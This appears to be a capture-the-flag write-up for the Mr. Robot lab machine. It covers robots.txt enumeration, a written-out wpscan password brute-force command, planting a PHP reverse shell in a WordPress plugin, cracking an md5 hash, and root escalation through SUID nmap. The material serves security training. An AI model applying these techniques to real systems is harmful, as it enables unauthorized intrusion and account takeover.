From IMDB, Mr. Robot series: “Elliot, a brilliant but highly unstable young cyber-security engineer and vigilante hacker, becomes a key figure in a complex game of global dominance when he and his shadowy allies try to take down the corrupt corporation he works for.“
- valuable information exposed in /robots.txt
- password leaked, able to bruteforce authentication with a special wordlist
- found in their home folder, a user’s password was md5 hashed and saved in a file
- an SUID binary was exploited for privilege escalation
◇ port 80 http
◇ port 443 https
◇ they both appear to be the same site
wappalyzer shows this site runs on WordPress CMS.
The first flag is exposed in /robots.txt
A wordlist is also available for download: fsocity.dic, 858160 lines
The wordlist can be condensed, as duplicates exist
cat fsocity.dic | sort | uniq > fsocity_uniq.txt
#fsocity_uniq.txt, 11451 lines
/ascpath, opening a wordpress blog site.
The MC of Mr. Robot is Elliot, and the login page confirms this username is valid
$wpscan --url http://10.10.104.200/wp-login.php --usernames elliot --passwords fsocity_uniq.txt -t 40
Once password is cracked and Elliot is logged in, the classic approach to achieving a reverse shell is to modify a plugin .php file with malicious reverse shell php code and executing the reverse shell by navigating to it’s location in the browser.
After the script is modified, navigate to /wp-content/plugins/hello.php to execute the reverse shell.
The reverse shell connection is in the context of “daemon” user. This user does not have access to read the second flag but can read a md5 hash in “robot” user’s home folder.
Crack the hash and switch to “robot” user to read the second flag.
- the hash can be queried on crackstation.net
The third flag is most likely in the /root folder, so need to escalate privilege.
Searching for files with the SUID bit set shows the nmap binary.
According to GTFOBINS (https://gtfobins.github.io/gtfobins/nmap/#suid), nmap interactive mode can spawn a shell and keep the context of “root” user.
The third flag is in /root